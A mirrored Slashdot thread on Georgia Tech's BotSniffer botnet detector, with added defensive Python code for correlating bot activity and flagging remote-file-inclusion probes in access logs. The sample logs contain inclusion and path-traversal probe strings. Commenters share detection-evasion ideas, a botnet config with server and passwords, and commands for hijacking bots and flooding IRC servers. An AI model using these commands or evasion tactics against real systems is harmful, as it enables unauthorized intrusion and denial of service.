Slashdot Mirror


Prototype Software Sniffs Out, Disrupts Botnets

coondoggie writes "Earlier this week researchers unveiled a system to identify and eradicate botnets in the wild. While currently only a prototype, Georgia Tech's BotSniffer would use network-based anomaly detection to identify botnet command and control channels in a LAN. The system wouldn't require any prior knowledge of signatures or server addresses. 'The researchers said their prototype, which was presented at the Internet Society's Network and Distributed System Security Symposium this week, is based on the fact that botnets engage in coordinated communication, propagation, and attack and fraudulent activities.'"
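The coordination the summary describes, as an added example (not Georgia Tech's BotSniffer code): a small Python detector that groups LAN hosts by the remote server they share and scores how many of them perform the same activity inside one time window. Hosts, addresses, activities and timings are constructed, and the window and threshold defaults are assumptions.

```python
"""Toy BotSniffer-style correlation detector (added example).

Not Georgia Tech's code. It implements the idea in the summary: internal hosts
that share one remote server and then perform the same activity at nearly the
same time score high; hosts whose activity is uncorrelated score low.
Hosts, addresses, activities and timings below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float       # seconds since capture start
    client: str     # internal host that produced the event
    server: str     # remote endpoint "ip:port" the host talked to just before
    activity: str   # what the host did afterwards, e.g. "scan", "report"


def group_by_server(events, min_clients=3):
    """Map each remote endpoint to the internal hosts using it, keeping only
    endpoints shared by at least `min_clients` hosts (a C&C candidate)."""
    members = defaultdict(set)
    for e in events:
        members[e.server].add(e.client)
    return {s: c for s, c in members.items() if len(c) >= min_clients}


def sync_score(events, server, clients, window):
    """Largest fraction of `clients` that performed the same activity inside
    one `window`-second span; 1.0 means the whole group acted together."""
    by_activity = defaultdict(list)
    for e in events:
        if e.server == server and e.client in clients:
            by_activity[e.activity].append((e.ts, e.client))
    best = 0.0
    for items in by_activity.values():
        items.sort()
        for i, (t0, _) in enumerate(items):
            # distinct hosts whose event falls within `window` of this one
            seen = {c for t, c in items[i:] if t - t0 <= window}
            best = max(best, len(seen) / len(clients))
    return best


def detect(events, window=30.0, threshold=0.8, min_clients=3):
    """Return {server: score} for candidate C&C endpoints whose client group
    shows synchronized activity at or above `threshold` (assumed defaults)."""
    flagged = {}
    for server, clients in group_by_server(events, min_clients).items():
        score = sync_score(events, server, clients, window)
        if score >= threshold:
            flagged[server] = round(score, 2)
    return flagged


def _burst(server, hosts, activity, times):
    """One event per host for a constructed activity burst."""
    return [Event(t, h, server, activity) for h, t in zip(hosts, times)]


# Constructed capture: five hosts on one IRC server that all scan within a few
# seconds and report back together, five hosts fetching from a web server at
# unrelated times, and one host talking to a server nobody else uses.
BOTS = ["10.0.0.11", "10.0.0.12", "10.0.0.13", "10.0.0.14", "10.0.0.15"]
USERS = ["10.0.0.21", "10.0.0.22", "10.0.0.23", "10.0.0.24", "10.0.0.25"]
C2 = "198.51.100.7:6667"
WEB = "203.0.113.10:80"

SAMPLE = (
    _burst(C2, BOTS, "scan", [101, 103, 102, 104, 106])
    + _burst(C2, BOTS, "report", [120, 121, 125, 119, 122])
    + _burst(WEB, USERS, "download", [0, 400, 900, 1500, 2200])
    + [Event(50, "10.0.0.31", "192.0.2.9:443", "download")]
)

# Same bots, but each waits a different delay before scanning, so the burst is
# spread over about a minute (the evasion several comments on this story raise).
JITTERED = (
    _burst(C2, BOTS, "scan", [101, 115, 130, 142, 160])
    + _burst(WEB, USERS, "download", [0, 400, 900, 1500, 2200])
)

if __name__ == "__main__":
    print(detect(SAMPLE))                # only the IRC endpoint is flagged
    print(detect(JITTERED, window=30))   # a 30 s window misses the spread-out scans
    print(detect(JITTERED, window=60))   # a wider window recovers them, at the
                                         # cost of more benign groups crossing it
```

Run on its own it flags only the IRC endpoint in the first capture, misses the jittered capture at a 30 s window and recovers it at 60 s, which is the window-versus-false-positive trade-off the comments argue about.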

51 comments

  1. Does it detect torrents? by imbaczek · · Score: 2, Interesting

    I can see RIAA and friends going green with envy if it worked.

  2. way easier idea by ILuvRamen · · Score: 3, Informative

    We don't need AI and network scanners and blah blah blah. It's crazy easy to detect just by the traffic patterns and amount of data sent if a computer is infected. So ISPs detect everyone that sent data to known botnet targets or controllers and disconnect that customer until they disinfect themselves. Then everyone will be convinced to practice better overall security and they won't crack down on p2p as much because botnet traffic will no longer bog down entire ISP networks and I'll have lots of business as a computer repairer :-P it's the perfect idea really.

    --
    Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
    1. Re:way easier idea by Anonymous Coward · · Score: 1, Interesting

      My college had this policy when I was an undergrad. They used it on a Windows box I didn't care much about since I only used it to play movies on my TV. It was enough to keep me from ever using Windows again. I'd wager that most people would come up with more temporary solutions (changing ISPs, buying a new computer, etc.). One can always dream, though.

    2. Re:way easier idea by Anonymous Coward · · Score: 0
      The hell? How did the parent get modded informative?!

      He wrote:

      We don't need AI and network scanners and blah blah blah. It's crazy easy to detect just by the traffic patterns and amount of data sent if a computer is infected.


      and

      botnet traffic will no longer bog down entire ISP networks


      I know this is slashdot, but did you read the article (or have any preexisting knowledge about botnets before posting this)?

      See in TFA:

      Georgia Tech's BotSniffer uses network-based anomaly detection to identify botnet command and control channels in a local area network without any prior knowledge of signatures or server addresses, the researchers said.


      and

      Botnet command and control traffic, which often uses Internet Relay Chat (IRC) or HTTP protocols, is difficult to detect because it follows normal protocol usage and is similar to normal network traffic. Botnet traffic volume is low as well and may contain encrypted communication, adding to the difficulty, researchers said.


      FFS, if detecting botnet traffic was really "crazy easy"... don't you think it would have been figured out a long time ago?
    3. Re:way easier idea by Anonymous Coward · · Score: 0

      FFS, if detecting botnet traffic was really "crazy easy"... don't you think it would have been figured out a long time ago?

      It has been, repeatedly. Every time a new botnet is deployed it has to be identified by traffic patterns, as stated. It takes less than a day usually, which I'd say qualifies as quickly & even "crazy easy" but still takes time. Automating that would save time for more productive uses. Yay!
    4. Re:way easier idea by ILuvRamen · · Score: 1

      what planet do you live on? Spam takes up such a huge amount of all internet traffic, they thought it was going to crash the entire internet at the current rate of increase just a few years ago. Wasn't it like half of all traffic or something? And like 90% of spam is sent by botnet comps.

      --
      Google's Super Secret Search Algorithm: SELECT @search_results FROM internet WHERE @search_results = 'good'
    5. Re:way easier idea by Anonymous Coward · · Score: 0

      Spam takes up such a huge amount of all internet traffic


      Internet traffic != email traffic
    6. Re:way easier idea by Anonymous Coward · · Score: 0

      This is fantastic. Not only do you not read the fucking article, but you don't even read the fucking comment to which you are replying.

      For the record, the article states, in part, "Botnet traffic volume is low [...], researchers said."

      And, yet, your response is, "what[sic] planet do you live on?" And then later, "And like 90% of spam is sent by botnet comps[sic]."

      So... I don't know. Should I listen to researchers at Georgia Tech? Or should I listen to a random guy on slashdot who cannot even grasp the basic rules[*] of the grammar of the human language he uses to communicate to his fellow (presumed) humans?

      * - In English, words which begin a sentence are capitalized. Also, English sentences have a subject.

  3. Prior art ... by tomhudson · · Score: 3, Funny

    I can see RIAA and friends going green with envy if it worked.

    Won't happen ... From the summary:

    is based on the fact that botnets engage in coordinated communication, propagation, and attack and fraudulent activities

    The RIAA / MPAA / Congresscritters / Lobbyists / Subprime Lenders ? BushCheneyHalliburtonCo all claim prior art ...

  4. Useful but fundamentally flawed.... by DigitalisAkujin · · Score: 4, Interesting

    This will work for plain text IRC connections but what if the bot is on an encrypted IRC connection?

    While this is a step in the right direction it will be outmaneuvered quickly.

    1. Re:Useful but fundamentally flawed.... by Anonymous Coward · · Score: 4, Informative

      Don't be so quick to say that it won't work. We don't have enough information as to how it is designed, and you don't understand how anomaly-based detection works. The idea behind network anomaly-based detection is to identify communication between two or more hosts that isn't supposed to exist or that didn't in the past. That is the 5-cent explanation of it.

    2. Re:Useful but fundamentally flawed.... by TubeSteak · · Score: 4, Insightful

      "For instance, at a similar time, the bots within a botnet will execute the same command -- obtain system information, scan the network -- and report to the command and control server with the progress/result of the task. Normal network activities are unlikely to demonstrate such a synchronized or correlated behavior."

      That is why it won't matter if the botnet is using encrypted communications or not.

      Unfortunately, it wouldn't be much of a challenge to institute a randomized delay between receiving commands, executing them, and reporting back to the C&C. The C&C could even change the randomization factor depending on how many bots are in that specific subnet of IPs. More bots = more time delay to thwart the sniffer.
      --
      [Fuck Beta]
      o0t!
    3. Re:Useful but fundamentally flawed.... by Professr3 · · Score: 5, Informative

      The very nature of botnet activities usually requires a coordinated effort. You can't DDOS a website with randomly-delayed attacks from each host, because then it wouldn't be a DDOS, just a slower increase in traffic. Spam campaigns usually only work for the first few minutes before services catch on, and then that particular spam campaign is over. Unless all the bots participate reasonably simultaneously, they can't accomplish their goals as well.

    4. Re:Useful but fundamentally flawed.... by kvezach · · Score: 3, Interesting

      This will work for plain text IRC connections but what if the bot is on an encrypted IRC connection?

      Or Achord for that matter. If the botnet is based on a peer to peer structure and the author has added public-key encryption, all he has to do is connect to an arbitrary bot host and insert the (signed) command which propagates through the network to all the other nodes; there'll be no fixed master server to home in on.
    5. Re:Useful but fundamentally flawed.... by eonlabs · · Score: 4, Interesting

      This brings me to several questions:

      What happens if a new host, or several new hosts are added to the network?
      What happens if this is a public wifi where new hosts are added and dropped all the time?

      If the functionality is as described in the article summary and it looks for coordinated communications, how will it interpret bittorrent style communications, where a lot of different computers, some possibly infected, most not, are transferring data to and from a single host trying to download?

      It sounds like swarming algorithms are the kind of behavior it would be looking for.
      Just thinking out loud...

      --
      I wouldn't consider the mad hatter mad. Just reality impaired. He sure can make a mean cup of tea.
    6. Re:Useful but fundamentally flawed.... by irc.goatse.cx+troll · · Score: 1

      Obviously the solution is to legislate against internet terrorist tools like IRC encryption.

      Really though, I don't think they're just grepping for .udpflood here, that would not be news. What I got from the summary was that they were using anomaly detection to see for example that 25 hosts all started sending mass data after having a communication with one IP. Doesn't matter what's in that connection, it at least gives you somewhere to start.

      --
      Pain lasts, kid. Its how you know you're alive. Sometimes I think this growing up thing is just pain management-TheMaxx
    7. Re:Useful but fundamentally flawed.... by somersault · · Score: 2, Funny

      I knew there was something evil about our WSUS server

      --
      which is totally what she said
    8. Re:Useful but fundamentally flawed.... by TubeSteak · · Score: 2, Interesting

      You can't DDOS a website with randomly-delayed attacks from each host, because then it wouldn't be a DDOS, just a slower increase in traffic.

      On average, Botnets are no longer hundreds or thousands strong, they've grown into the tens of thousands...
      As an exceptional case, F-Secure claims Storm is a million strong.

      Do you really need tens/hundreds of thousands of bots attacking all at once? Even if the answer to that question is yes, the bots are still polled for status & told to fetch updates. Introducing a randomized delay will certainly help hide non-attack behavior, which will undoubtedly prolong the life of the botnet.

      However, with a million bots, you could easily afford to randomize attack behavior. If TFA's technology spreads, botnets may have to have 3*X bots spitting out data randomly instead of X bots attacking instantly with 100% of their bandwidth in an easily discerned pattern. How else do you propose to defeat a sniffer looking for patterns in the network traffic?
      --
      [Fuck Beta]
      o0t!
    9. Re:Useful but fundamentally flawed.... by Anonymous Coward · · Score: 0

      The idea behind network anomaly-based detection is to identify communication between two or more hosts that isn't supposed to exist or that didn't in the past. That is the 5-cent explanation of it.

      Oh yeah, that's the 5-cent explanation of a firewall too. In reality it means having a dialog box pop up at you once every 5 minutes. So figure out if svchost needs to access port 2096 at IP a.b.c.d.

      Also coordinated action is not exactly "evil" all the time. I wonder what happens to P2P networks, torrents, distributed projects like folding-at-home.

      Maybe the user can whitelist those apps? Well then so can the trojan.

      Seems like we're looking at another huge pile of dialog boxes at some point in this algorithm again, aren't we?

    10. Re:Useful but fundamentally flawed.... by gr8scot · · Score: 1

      Unfortunately, it wouldn't be much of a challenge to institute a randomized delay between receiving commands, executing them, and reporting back to the C&C. The C&C could even change the randomization factor depending on how many bots are in that specific subnet of IPs. More bots = more time delay to thwart the sniffer.

      That's why I think these kinds of reports should be available only in pay-per-view journals and university CS/engineering departments.
      --
      All 19 hijackers were known terrorists 09-10-2001. Lack of FBI intelligence does not justify warrantless wiretaps..
    11. Re:Useful but fundamentally flawed.... by Kent+Recal · · Score: 1

      And, just to add another datapoint, it wouldn't be hard to synchronize the bots to a common time source and simply schedule your attack in advance. Think CronBot(tm).

    12. Re:Useful but fundamentally flawed.... by Dextrously · · Score: 1

      This could end up making life easier on the ring leaders of most botnets. The two purposes I generally see these botnets used for when I worked at a data center were generally to nuke a host offline, or slowly and subtly raise the average bandwidth of a host thereby incurring extreme monthly bandwidth charges to them. Generally, they will extort money from the victim by these means.

      Say that this technology is tricked into believing that uninvolved host "X" is part of a botnet; now host "X" is effectively knocked offline or hassled into some troubling TOS issue with their provider due to suspected illegal activity. Mission accomplished for the botnet owners.

      It really depends on how it "disrupts" the botnet. The article doesn't clearly state how this is done.

    13. Re:Useful but fundamentally flawed.... by ultranova · · Score: 2, Interesting

      What I got from the summary was that they were using anomaly detection to see for example that 25 hosts all started sending mass data after having a communication with one IP.

      Unless, of course, they got their instructions in an e-mail. Spam is already semi-randomized to get past filters, so it wouldn't be hard to have it carry encoded instructions too.

      Or have them use instant messaging. The zombie worm should detect which IM program the user uses, and send a message to the control (or one of various fake identities) using that, so the control knows to send messages back using it as well.

      Heck, you could have a two-part worm which infects both Web servers and desktops. An infected desktop infects any server it contacts, and an infected server infects any desktop which contacts it. If the server and desktop are both already infected, they pass whatever new messages (commands) they have to each other.

      You can get around anomaly detection by not causing any anomalies. Piggyback your messages on already existing connections rather than starting new ones. Basic spy stuff, really.

      --

      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

  5. applications of abstract theory you say? by machine+of+god · · Score: 1

    It just occurred to me that there is going to be a point in this arms race where I am going to be interested enough to want to participate. Now how do I go about bringing myself up to speed on the subject I wonder.

  6. Even easier way ... . by Anonymous Coward · · Score: 5, Interesting

    Just run a web server where you allow things like ...

        index.php?main=xxx

    and then watch the attempts that come in for xxx, they will all be scripts that trigger the botnets. Grab the scripts and you have the irc server, the channel, etc.

    A recent one that I saw was on katana.webchat.org in channel #msdos -- no idea if it is still running (ironic since webchat is supposed to have a security team). I reported it, but never heard anything back.

    Here are a bunch of other ones, access to botnets, free of charge.


    Use at your own risk, and maybe, these folks will get off their rear ends and shut these things down.
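The honeypot approach above, turned around to the log side as an added example (not the commenter's own setup): a Python pass over constructed Apache-format access log entries that flags query-string values which are absolute URLs, the shape of an inclusion probe, and counts the remote hosts so they can be reported. Parameter names, client addresses and the example.invalid host are constructed.

```python
"""Spot remote-file-inclusion probes in a web server access log.

Added example, not the commenter's setup. Instead of serving an includable
index.php?main=xxx and watching what arrives, it reads the access log for
query-string values that are absolute URLs, which is what an inclusion probe
looks like, and tallies the remote hosts for reporting. The log lines are
constructed in Apache "combined" format.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# URL schemes PHP's include() will fetch when allow_url_include is enabled.
REMOTE = ("http://", "https://", "ftp://")


def rfi_attempts(lines):
    """Return [(client, parameter, remote_url)] for requests whose query-string
    values are absolute URLs. Unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # probes append "?" or a null byte so the script's own suffix
            # (e.g. ".php") is ignored; drop that before classifying
            cleaned = value.rstrip("?").split("\x00")[0]
            if cleaned.lower().startswith(REMOTE):
                hits.append((m.group("client"), name, cleaned))
    return hits


def hosting_report(hits):
    """Count probes per remote host: the list to pass to those hosts'
    providers, rather than fetching the scripts yourself."""
    counts = {}
    for _, _, url in hits:
        host = urlsplit(url).netloc.lower()
        counts[host] = counts.get(host, 0) + 1
    return counts


# Constructed log lines: one pbot-style probe, a normal request, a local path
# traversal attempt (not remote, so not an RFI hit), a second probe with an
# upper-case scheme and %00 suffix, and a line that is not a log entry at all.
LOGS = [
    '203.0.113.5 - - [10/Feb/2008:14:22:01 +0000] "GET /index.php?main=http://example.invalid/pbot.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [10/Feb/2008:14:22:07 +0000] "GET /index.php?main=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Feb/2008:14:23:11 +0000] "GET /index.php?main=../../etc/passwd%00 HTTP/1.1" 404 180 "-" "curl/7.18"',
    '203.0.113.77 - - [10/Feb/2008:14:25:40 +0000] "GET /page.php?page=HTTP://example.invalid/inc/spread.txt%00 HTTP/1.0" 200 512 "-" "libwww-perl/5.805"',
    'garbage line that is not a log entry',
]

if __name__ == "__main__":
    for client, param, url in rfi_attempts(LOGS):
        print(f"{client} tried to include {url} via parameter {param}")
    print(hosting_report(rfi_attempts(LOGS)))
```

Legitimate parameters that carry URLs (redirect targets, feed readers) will show up too, so filter those names out before reporting.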

    1. Re:Even easier way ... . by 0100010001010011 · · Score: 2, Interesting

      ROFL this is tons of fun.

      I just took over a bot net. Read the source code and figured out what's going on and how to log in to them. Man these things are semi-complex.

      I just took over one and killed it. Dude was none too happy:
      16:20 macacao> l3
      16:21 macacao> SE EU TE PEGO
      16:21 macacao> EU VO CUMER
      16:21 macacao> TEU CU
      16:21 macacao> FILHO DA PUTA

    2. Re:Even easier way ... . by 0100010001010011 · · Score: 2, Interesting

      Because script kiddies are getting lazier and lazier.

      All the ones I was messing with were the php ones that had a config file like this:
      --
      var $config = array("server"   => "katana.webchat.org",
                          "port"     => 6667,
                          "pass"     => "",        // server password
                          "prefix"   => "L",
                          "maxrand"  => 8,
                          "chan"     => "#samera",
                          "key"      => "fucked",  // channel password
                          "modes"    => "+p",
                          "password" => "ts",      // bot password
                          "trigger"  => ".",
                          "hostauth" => "*"        // * for any hostname
                          );
      --
      And now that I went back and refreshed, they changed the channel and password.

      The commands aren't too difficult, they're in the header of a few other files that are linked in the original post. Just make sure that you have all your commands queued up and copy and paste them in at once. I didn't and the original bot owner took control and had them all die :-P

      I rewrote the script so that instead of actually doing the commands it just logs what it should have done and returns a positive response to the channel. So far I have a few UDP floods, I think I'll observe these guys for a while. Should be some entertainment for Saturday night.

    3. Re:Even easier way ... . by Anonymous Coward · · Score: 0

      I have not seen where you can "take it over", but you can make life hell for the "owners".

      Log in; it is best to use the criteria that they are expecting victims to log in as, to prevent early detection.

      Then you start issuing . commands; first off, the .user command with the password in the TXT file will get you authorized, then you can issue other . commands ...like .die to kill all the bots.

      Even more gratifying would be to kill all the Ops in the channel by .tcpflood-ing them. Then .die the rest of the bots and try to take over the channel. This would be hard to do, but is worth a try.

      Your other option to shut down the botnet is to simply .tcpflood the IRC server and port that the botnet is using.

    4. Re:Even easier way ... . by 0100010001010011 · · Score: 2, Informative

      Yes, that's what I was showing: they accept authentication from ANYONE. .user and I'm in.

      And all these idiots did was ban my *!user@host. I reconnected via irssi after changing my username and I got back in. I'm trying to script up something entertaining but sadly the IRC server masks host names :(. They already uploaded and made changes to the original link; I wonder if they have any idea their config file is bookmarked on Slashdot.

    5. Re:Even easier way ... . by MikeS2k · · Score: 1

      http://gikowns.googlepages.com/BOTNET-GIKO.txt

      I'm now in one particular channel on Quakenet, and it'll only let you issue the .user command (or indeed any other command) if your hostname matches that in the config - this one in particular will only accept "Giko.users.quakenet.org" as the hostname.

      I tried to log in to his Quakenet account, but alas, the password doesn't match the one he chose for his bot's authpass :-(

      The channel had about 7 bots anyhow, so either he's moved them along or just isn't very lucky ;)

      --
      120 characters should be enough for anybody
  7. They need to think about this... by twotailakitsune · · Score: 1

    BotSniffer can capture network command and control protocols and utilize statistical algorithms to detect botnets.

    So it uses signatures.

    identify botnet command and control channels in a local area network.

    So you can't have a 10,000 botnet on a LAN.... Not that I would like some ISP to use this. Now some guy at Comcast will "fight the evil botnets". BotSniffer sounds like a kill the massage-girl thing.

    has a very low false positive rate

    So, what about when BotSniffer shuts down things that are not an "evil botnet"? (IRC, ...)

    Normal network activities are unlikely to demonstrate such a synchronized or correlated behavior.

    A lot of automatic network activities are very correlated.

    I know, complaining over nothing.

    1. Re:They need to think about this... by Anonymous Coward · · Score: 0

      Wow you're stupid. Please never post again.

  8. Will it stop BitTorrent? by Anonymous Coward · · Score: 5, Insightful

    At the traffic level, BitTorrent looks a lot like a bot net. It has a central controller (the tracker) and makes random connections to other peers, which then trade large amounts of data.

    So would this kill BitTorrent? I've heard network security people explain how peer-to-peer technologies are a dead end because they're impossible to run on a secure network since they do look like botnets. How does this deal with that?

    1. Re:Will it stop BitTorrent? by Anonymous Coward · · Score: 0

      Well, the amount of data exchanged through bittorrent surely has a different symmetry than a botnet intent on DDoSing a website or sending spam. If botnet nodes talk to each other only, too bad for the compromised nodes, but for the rest of the net it is not so big an issue. my 2c.

    2. Re:Will it stop BitTorrent? by Anonymous Coward · · Score: 0

      They're only looking for IRC traffic (they mention HTTP, but I believe that's only for remote page inclusion -- i.e. pbot). After that, they're looking for patterns in protocol-specific traffic.

      SSL connections will ruin the entire thing, unless they are relying on watching outbound traffic too.

      I don't see what's so new or inventive about this.

  9. Botnets are easy to detect and control by colinmcnamara · · Score: 5, Informative

    Botnets are easy to detect and control. The problem is that the majority of organizations have not taken the steps to stop both their communication and control channels, and their ability to launch attacks. What should everybody do?

    1. Deny IRC traffic at your firewalls. If there is a business need for IRC then set up an IRC proxy, or inline authentication. This simple step will stop many of the bots out there from phoning home.

    2. Enable reverse path detection on your network devices. This forces your internal routers to check whether the source IP address that the bot is sending is available out the interface that your compromised host exists on.

    3. Enable DHCP snooping on your edge switches. By configuring this feature the switchport that your host plugs into passively observes what IP address was given to your computer. If traffic is spoofed (a common occurrence for botnets) the switchport effectively shuts your host down.

    4. Monitor your network. There are many free and commercial products that will make it clear that your traffic profiles have changed. Some good free tools for this are Cacti - http://www.cacti.net/, Nagios - http://www.nagios.org/ and NTOP - http://www.ntop.org/

    5. Utilize updated antivirus technology, hopefully one that reports to a central console. These are simple steps that frankly most people do not use in their networks. If they would, the botnet issue would be greatly minimized.

    --
    Colin McNamara - CCIE #18233 "The difficult we do immediately, the impossible just takes a little longer"
  10. It Has To Be Said by Hawkeye05 · · Score: 1

    By the time Skynet became self-aware it had spread into millions of computer servers across the planet. Ordinary computers in office buildings, dorm rooms; everywhere. It was software; in cyberspace. There was no system core; it could not be shutdown. The attack began at 6:18 PM, just as he said it would. Judgment Day, the day the human race was almost destroyed by the weapons they'd built to protect themselves. I should have realized it was never our destiny to stop Judgment Day, it was merely to survive it, together. The Terminator knew; he tried to tell us, but I didn't want to hear it. Maybe the future has been written. I don't know; all I know is what the Terminator taught me; never stop fighting. And I never will. The battle has just begun.

    Any Similarities?

    --
    Http://Stineomite.org (Yeah Thats Right I'm An Organization)
    1. Re:It Has To Be Said by Lobster+Quadrille · · Score: 1

      Any Similarities? Not really, no.
      --
      "The cup is in turn designed for holding hot or cold liquids, and has an open rim and closed base." --US Patent #5425497
  11. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  12. Re:shitty idea by Anonymous Coward · · Score: 0

    You obviously don't understand what anomaly detection is. If you don't know about a subject, shut the fuck up and stop trying to comment okay?

  13. let me get this botnet thing right by Anonymous Coward · · Score: 0

    let me get this right. bots in the net routinely connect to a C&C server and then execute identical commands...

    so just like the MSAutoUpdate? I like the direction this could go!!!

  14. Comment removed by account_deleted · · Score: 3, Interesting

    Comment removed based on user account deletion

  15. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  16. It's an arms race by vinn01 · · Score: 3, Insightful


    The system as described shows promise. The current crop of botnet software all exhibit a behavior pattern that can be detected.

    Of course there have been other attempts at botnet detection software, but network deployment has been sparse. Deployment is key. Maybe Georgia Tech's good name will help get it deployed. It has to be proved useful to the large network operators or it will never spread beyond a few test systems.

    The network operators have to want this detection software enough to deploy and maintain it. It has to help their bottom line. Then it can be developed beyond a university research prototype.

    Will the bad guys update the botnet software to outmaneuver the good guys? You can bet on it. But keep in mind that the people who developed the botnet software are generally not the same ones who operate the largest botnets. The botnet operators will be greatly impacted until they can get updated software and then get it deployed.

    This system will cause a botnet disruption that will take time to rebuild. Then, the botnet detection software will need to be updated. And the arms race will continue...

    1. Re:It's an arms race by smellotron · · Score: 1

      The network operators have to want this detection software enough to deploy and maintain it. It has to help their bottom line. Then it can be developed beyond a university research prototype.

      It does help the bottom line of last-hop ISPs. If 50% of your network traffic is from virus-infected computers, you can double your effective capacity with perfect virus detection and quarantine. It also provides a pretty strong encouragement for users to get their computers fixed, since a virus means "no internet" rather than "slow internet".

      Obviously, detection isn't perfect, and there's some point where the cumulative cost of maintenance, false positives (support calls and subscription cancellation from angry customers), and false negatives (bandwidth cost for the viral traffic) goes too high. If the quality is below some point, it will just be a net financial burden. But I know at least one ISP that has used virus quarantining to good effect.

  17. Better takedown, not DPI by Mark(ATL) · · Score: 2, Insightful

    The problem is not one of identification; it is very easy to detect members of a botnet without resorting to Deep Packet Inspection everywhere. The main problem is lack of local laws and regulation, and varying degrees of takedown management.

  18. Make your network Botnet resistant by Yoshimetso · · Score: 1

    1) Deploy network IPS
    2) Deploy HIPS
    3) Deploy Anti virus solution (symantec, kaspersky, trend micro)
    4) Firewall Rules
    5) Windows WSUS (updates)
    6) Switch IDS cards (Cisco)
    7) Sniff and monitor high traffic utilization
    8) Internet Content filtering (ex. WebSense + the advanced protection option to filter requests to infected hosts)
    9) Good Anti Spam solution (ex. Borderware MXstream)
    10) Educate users

    --
    ExtremeSecurity Blog Admin http://extremesecurity.blogspot.com/

  19. Time for a Paradigm Shift? by mac_mcgrew · · Score: 1

    Perhaps what I have to say is oversimplifying or ignorant. But I'm sure the nice people here at Slashdot will be more than willing to educate me.

    The more I watch this issue, the more it seems clear to me that a losing battle is being fought. I picture an analogous world where, by default, houses are constructed with multiple doors that open to the outside world. And also by default, the doors are not locked. To make matters worse, the locks on the doors aren't visible. So even after a door has been secured, the owner can't be sure if it really is secure other than to try to open it. Isn't this the computing world we live in now?

    I imagine that when the current mainstream operating systems were conceived the architects didn't imagine thousands of attackers, script kiddies and zombies knocking on their "doors". But that was a different time. It seems to me that the true solution to this issue, and many others, is a paradigm shift. It seems that we really need an OS that is built from the ground up with a stronger sense of security. Perhaps an OS that requires interaction from the user to enable communication with others.

    By no means have I laid out a full plan for such a system. I don't know...I almost feel silly now that I see this in writing. But it seems to me that all we're doing now is applying band-aids to a design that didn't take our current computing environment into account.

    --
    If it ain't made of shiny plastic building bricks, I'm only partially interested.